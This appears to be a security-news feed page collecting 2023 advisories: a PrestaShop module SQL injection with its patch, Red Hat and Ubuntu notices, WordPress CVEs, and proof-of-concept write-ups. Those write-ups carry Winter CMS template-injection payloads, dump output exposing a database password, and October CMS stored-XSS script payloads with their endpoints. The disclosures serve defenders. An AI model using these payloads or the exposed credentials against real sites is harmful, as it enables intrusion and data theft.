In the module "Product Tag Icons Pro" (ticons) before 1.8.4 from MyPresta.eu for PrestaShop, a guest can perform SQL injection. The method TiconProduct::getTiconByProductAndTicon() has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

**IMPORTANT NOTICE**: DO NOT REPORT VULNERABILITIES SOLELY TO THE AUTHOR OR MARKETPLACE.

We urge you to report any vulnerabilities directly to us. Our mission is to ensure the safety and security of the PrestaShop ecosystem. Unfortunately, many module developers may not always recognize or acknowledge the vulnerabilities in their code, whether due to lack of awareness, or inability to properly evaluate the associated risk, or other reasons.

Given the rise in professional cybercrime networks actively seeking out these vulnerabilities, it's crucial that any potential threats are promptly addressed and the community is informed. The most effective method to do this is by publishing a CVE, like the one provided below.

Should you discover any vulnerabilities, **please report them to us at: report\[@\]security-presta.org** or visit https://security-presta.org for more information.

Every vulnerability report helps make the community more secure, and we are profoundly grateful for any information shared with us.

In the module “Product Tag Icons Pro” (ticons) up to version 1.8.4 from My Presta.eu for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-46353
*   **Published at**: 2023-11-28
*   **Platform**: PrestaShop
*   **Product**: ticons
*   **Impacted release**: <= 1.8.3 (1.8.4 fixed the vulnerability)
*   **Product author**: MyPresta.eu
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The method TiconProduct::getTiconByProductAndTicon() has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 1.8.3**

    --- 1.8.3/modules/ticons/models/TiconProduct.php
    +++ 1.8.4/modules/ticons/models/TiconProduct.php
    ...
            LEFT JOIN `' . _DB_PREFIX_ . 'ticon` c ON (a.`id_ticon` = c.`id_ticon`)
    -       LEFT JOIN `' . _DB_PREFIX_ . 'product_lang` b ON (b.`id_product` = a.`id_product` AND b.`id_lang` = ' . (int)Context::getContext()->language->id . ') WHERE a.id_product ="' . $id_product . '" ' . Shop::addSqlRestriction(false, 'b') . ' AND a.id_ticon="' . $id_ticon . '"');
    +       LEFT JOIN `' . _DB_PREFIX_ . 'product_lang` b ON (b.`id_product` = a.`id_product` AND b.`id_lang` = ' . (int)Context::getContext()->language->id . ') WHERE a.id_product ="' . (int) $id_product . '" ' . Shop::addSqlRestriction(false, 'b') . ' AND a.id_ticon="' . (int) $id_ticon . '"');
        }
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **ticons**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skill because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-08-02

Issue discovered during a code review by TouchWeb.fr

2023-08-02

Contact Author

2023-09-25

Author provide a patch

2023-10-17

Request a CVE ID

2023-10-23

Received CVE ID

2023-11-28

Publish this security advisory

**Links**

*   Author product page
*   National Vulnerability Database

**DISCLAIMER:** _The French Association Friends Of Presta (FOP) acts as an intermediary to help hosting this advisory. While we strive to ensure the information and advice provided are accurate, FOP cannot be held liable for any consequences arising from reported vulnerabilities or any subsequent actions taken._

CVE-2023-46353: [CVE-2023-46353] Improper neutralization of SQL parameter in My Presta.eu - Product Tag Icons Pro for PrestaShop

Winter CMS version 1.2.2 suffers from a server-side template injection vulnerability.

    # Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated)# Exploit Author: tmrswrr# Date: 12/05/2023# Vendor: https://wintercms.com/# Software Link: https://github.com/wintercms/winter/releases/v1.2.2# Vulnerable Version(s): 1.2.2#Tested : https://www.softaculous.com/demos/WinterCMS1 ) Login with admin cred and click CMS > Pages field > Plugin components >     https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup2 ) Write SSTI payload : {{7*7}}3 ) Save it , Click Priview :     https://demos6.demo.com/WinterCMS/demo/plugins4 ) You will be see result :     49 Payload :    {{ dump() }} Result :         "*::database" => array:4 [▼          "default" => "mysql"          "connections" => array:4 [▼            "sqlite" => array:5 [▼              "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite"              "driver" => "sqlite"              "foreign_key_constraints" => true              "prefix" => ""              "url" => null            ]            "mysql" => array:15 [▼              "charset" => "utf8mb4"              "collation" => "utf8mb4_unicode_ci"              "database" => "soft_pw3qsny"              "driver" => "mysql"              "engine" => "InnoDB"              "host" => "localhost"              "options" => []              "password" => "8QSz9(pT)3"              "port" => 3306              "prefix" => ""              "prefix_indexes" => true              "strict" => true              "unix_socket" => ""              "url" => null              "username" => "soft_pw3qsny"            ]            "pgsql" => array:12 [▶]            "sqlsrv" => array:10 [▶]          ]          "migrations" => "migrations"          "redis" => array:4 [▼            "client" => "phpredis"            "options" => array:2 [▼              "cluster" => "redis"              "prefix" => "winter_database_"            ]            "default" => array:5 [▼              "database" => "0"              "host" => "127.0.0.1"              "password" => null              "port" => "6379"              "url" => null            ]            "cache" => array:5 [▼              "database" => "1"              "host" => "127.0.0.1"              "password" => null              "port" => "6379"              "url" => null            ]          ]        ]      ]

Winter CMS 1.2.2 Server-Side Template Injection

Red Hat Security Advisory 2023-7656-03 - An update for the postgresql:12 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include integer overflow and remote SQL injection vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7656.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: postgresql:12 security update  
Advisory ID:        RHSA-2023:7656-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7656  
Issue date:         2023-12-05  
Revision:           03  
CVE Names:          CVE-2023-5868  
====================================================================

Summary: 

An update for the postgresql:12 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

PostgreSQL is an advanced object-relational database management system (DBMS).

Security Fix(es):

* postgresql: Buffer overrun from integer overflow in array modification (CVE-2023-5869)

* postgresql: Memory disclosure in aggregate function calls (CVE-2023-5868)

* postgresql: extension script @substitutions@ within quoting allow SQL injection (CVE-2023-39417)

* postgresql: Role pg_signal_backend can signal certain superuser processes. (CVE-2023-5870)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5868

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2228111  
https://bugzilla.redhat.com/show_bug.cgi?id=2247168  
https://bugzilla.redhat.com/show_bug.cgi?id=2247169  
https://bugzilla.redhat.com/show_bug.cgi?id=2247170

Red Hat Security Advisory 2023-7656-03

Ubuntu Security Notice 6529-1 - It was discovered that Request Tracker incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6529-1  
December 04, 2023

request-tracker4 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in Request Tracker.

Software Description:  
- request-tracker4: An enterprise-grade issue tracking system

Details:

It was discovered that Request Tracker incorrectly handled certain inputs. If  
a user or an automated system were tricked into opening a specially crafted  
input file, a remote attacker could possibly use this issue to obtain  
sensitive information. (CVE-2021-38562, CVE-2022-25802, CVE-2023-41259,  
CVE-2023-41260)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   request-tracker4                4.4.4+dfsg-2ubuntu1.23.10.1  
   rt4-apache2                     4.4.4+dfsg-2ubuntu1.23.10.1  
   rt4-clients                     4.4.4+dfsg-2ubuntu1.23.10.1  
   rt4-db-mysql                    4.4.4+dfsg-2ubuntu1.23.10.1  
   rt4-db-postgresql               4.4.4+dfsg-2ubuntu1.23.10.1  
   rt4-db-sqlite                   4.4.4+dfsg-2ubuntu1.23.10.1  
   rt4-fcgi                        4.4.4+dfsg-2ubuntu1.23.10.1  
   rt4-standalone                  4.4.4+dfsg-2ubuntu1.23.10.1

Ubuntu 23.04:  
   request-tracker4                4.4.4+dfsg-2ubuntu1.23.04.1  
   rt4-apache2                     4.4.4+dfsg-2ubuntu1.23.04.1  
   rt4-clients                     4.4.4+dfsg-2ubuntu1.23.04.1  
   rt4-db-mysql                    4.4.4+dfsg-2ubuntu1.23.04.1  
   rt4-db-postgresql               4.4.4+dfsg-2ubuntu1.23.04.1  
   rt4-db-sqlite                   4.4.4+dfsg-2ubuntu1.23.04.1  
   rt4-fcgi                        4.4.4+dfsg-2ubuntu1.23.04.1  
   rt4-standalone                  4.4.4+dfsg-2ubuntu1.23.04.1

Ubuntu 22.04 LTS:  
   request-tracker4                4.4.4+dfsg-2ubuntu1.22.04.1  
   rt4-apache2                     4.4.4+dfsg-2ubuntu1.22.04.1  
   rt4-clients                     4.4.4+dfsg-2ubuntu1.22.04.1  
   rt4-db-mysql                    4.4.4+dfsg-2ubuntu1.22.04.1  
   rt4-db-postgresql               4.4.4+dfsg-2ubuntu1.22.04.1  
   rt4-db-sqlite                   4.4.4+dfsg-2ubuntu1.22.04.1  
   rt4-fcgi                        4.4.4+dfsg-2ubuntu1.22.04.1  
   rt4-standalone                  4.4.4+dfsg-2ubuntu1.22.04.1

Ubuntu 20.04 LTS:  
   request-tracker4                4.4.3-2+deb10u3build0.20.04.1  
   rt4-apache2                     4.4.3-2+deb10u3build0.20.04.1  
   rt4-clients                     4.4.3-2+deb10u3build0.20.04.1  
   rt4-db-mysql                    4.4.3-2+deb10u3build0.20.04.1  
   rt4-db-postgresql               4.4.3-2+deb10u3build0.20.04.1  
   rt4-db-sqlite                   4.4.3-2+deb10u3build0.20.04.1  
   rt4-fcgi                        4.4.3-2+deb10u3build0.20.04.1  
   rt4-standalone                  4.4.3-2+deb10u3build0.20.04.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   request-tracker4                4.4.2-2ubuntu0.1~esm1  
   rt4-apache2                     4.4.2-2ubuntu0.1~esm1  
   rt4-clients                     4.4.2-2ubuntu0.1~esm1  
   rt4-db-mysql                    4.4.2-2ubuntu0.1~esm1  
   rt4-db-postgresql               4.4.2-2ubuntu0.1~esm1  
   rt4-db-sqlite                   4.4.2-2ubuntu0.1~esm1  
   rt4-fcgi                        4.4.2-2ubuntu0.1~esm1  
   rt4-standalone                  4.4.2-2ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6529-1  
   CVE-2021-38562, CVE-2022-25802, CVE-2023-41259, CVE-2023-41260

Package Information:  
   https://launchpad.net/ubuntu/+source/request-tracker4/4.4.4+dfsg-2ubuntu1.23.10.1  
   https://launchpad.net/ubuntu/+source/request-tracker4/4.4.4+dfsg-2ubuntu1.23.04.1  
   https://launchpad.net/ubuntu/+source/request-tracker4/4.4.4+dfsg-2ubuntu1.22.04.1

 https://launchpad.net/ubuntu/+source/request-tracker4/4.4.3-2+deb10u3build0.20.04.1

Ubuntu Security Notice USN-6529-1

The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.

CVE-2023-6063

The Easy Newsletter Signups WordPress plugin through 1.0.4 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

CVE-2023-5108

October CMS version 3.4.0 suffers from a persistent cross site scripting vulnerability when a user has article posting capabilities.

    OctoberCMS v3.4.0 (Wiki_article) Stored Cross-Site Scripting VulnerabilityVendor: October CMSProduct web page: https://www.octobercms.comAffected version: 3.4.0Summary: OctoberCMS is a self-hosted content management system (CMS)based on the PHP programming language and Laravel web application framework.It supports MySQL, SQLite and PostgreSQL for the database back end anduses a flat file database for the front end structure. The October CMScovers a range of capabilities such as users, permissions, themes, andplugins, and is seen as a simpler alternative to WordPress.Desc: OctoberCMS suffers from stored cross-site scripting vulnerabilitywhen a user with the ability to create an article could perform a storedXSS attack against any other users with the ability to create an article.This can lead to execute arbitrary HTML/JS code in a user's browser sessionin context of an affected site.Tested on: macOS Monterey 12.6.3           Docker 4.12.0 (85629)           PHP/8.1.6Vulnerability discovered by Nazli Soysal Kuran                            @zeroscienceAdvisory ID: ZSL-2023-5807Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5807.php30.10.2023--Stored XSS (EntryRecord[content]):----------------------------------Endpoint: /backend/tailor/entries/wiki_articlePayload: EntryRecord%5Bcontent%5D="<script>alert(1)</script>"

October CMS 3.4.0 Wiki Article Cross Site Scripting

October CMS version 3.4.0 suffers from a persistent cross site scripting vulnerability when a user has category-creating capabilities.

    OctoberCMS v3.4.0 (Category) Stored Cross-Site Scripting VulnerabilityVendor: October CMSProduct web page: https://www.octobercms.comAffected version: 3.4.0Summary: OctoberCMS is a self-hosted content management system (CMS)based on the PHP programming language and Laravel web application framework.It supports MySQL, SQLite and PostgreSQL for the database back end anduses a flat file database for the front end structure. The October CMScovers a range of capabilities such as users, permissions, themes, andplugins, and is seen as a simpler alternative to WordPress.Desc: OctoberCMS suffers from stored cross-site scripting vulnerabilitywhen a user with the ability to a category-creating feature that storesdata persistently could create a stored XSS attack against any other usersvisiting the blog page. This can lead to execute arbitrary HTML/JS codein a user's browser session in context of an affected site.Tested on: macOS Monterey 12.6.3           Docker 4.12.0 (85629)           PHP/8.1.6Vulnerability discovered by Nazli Soysal Kuran                            @zeroscienceAdvisory ID: ZSL-2023-5806Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5806.php30.10.2023--Stored XSS (EntryRecord[title]):--------------------------------Endpoint: POST /backend/tailor/entries/blog_category/createPayload: EntryRecord%5Btitle%5D="</title><script>alert(1)</script>"

October CMS 3.4.0 Category Cross Site Scripting

October CMS version 3.4.0 suffers from a persistent cross site scripting vulnerability when a user has blog-creating capabilities.

    OctoberCMS v3.4.0 (Blog) Stored Cross-Site Scripting VulnerabilitiesVendor: October CMSProduct web page: https://www.octobercms.comAffected version: 3.4.0Summary: OctoberCMS is a self-hosted content management system (CMS)based on the PHP programming language and Laravel web application framework.It supports MySQL, SQLite and PostgreSQL for the database back end anduses a flat file database for the front end structure. The October CMScovers a range of capabilities such as users, permissions, themes, andplugins, and is seen as a simpler alternative to WordPress.Desc: OctoberCMS suffers from stored cross-site scripting vulnerabilitywhen a user with the ability to a blog-creating feature that stores datapersistently could perform a stored XSS attack against any other usersvisiting the blog page. This can lead to execute arbitrary HTML/JS codein a user's browser session in context of an affected site.Tested on: macOS Monterey 12.6.3           Docker 4.12.0 (85629)           PHP/8.1.6Vulnerability discovered by Nazli Soysal Kuran                            @zeroscienceAdvisory ID: ZSL-2023-5805Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5805.php30.10.2023--Stored XSS (GlobalRecord[blog_name]):-------------------------------------Endpoint: POST /backend/tailor/globals/blog_configPayload: GlobalRecord%5Bblog_name%5D="</title><script>alert(1)</script>"

October CMS 3.4.0 Blog Cross Site Scripting

October CMS version 3.4.0 suffers from a persistent cross site scripting vulnerability when a user has author posting capabilities.

    OctoberCMS v3.4.0 (Author) Stored Cross-Site Scripting VulnerabilityVendor: October CMSProduct web page: https://www.octobercms.comAffected version: 3.4.0Summary: OctoberCMS is a self-hosted content management system (CMS)based on the PHP programming language and Laravel web application framework.It supports MySQL, SQLite and PostgreSQL for the database back end anduses a flat file database for the front end structure. The October CMScovers a range of capabilities such as users, permissions, themes, andplugins, and is seen as a simpler alternative to WordPress.Desc: OctoberCMS suffers from stored cross-site scripting vulnerabilitywhen a user with the ability to be an author feature could perform a storedXSS attack against any other users visiting the posts by the author. Thiscan lead to execute arbitrary HTML/JS code in a user's browser sessionin context of an affected site.Tested on: macOS Monterey 12.6.3           Docker 4.12.0 (85629)           PHP/8.1.6Vulnerability discovered by Nazli Soysal Kuran                            @zeroscienceAdvisory ID: ZSL-2023-5804Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5804.php30.10.2023--Stored XSS (EntryRecord[title]):--------------------------------Endpoint: /backend/tailor/entries/blog_authorPayload: EntryRecord%5Btitle%5D ="</title><script>alert(1)</script>"

Tag

#sql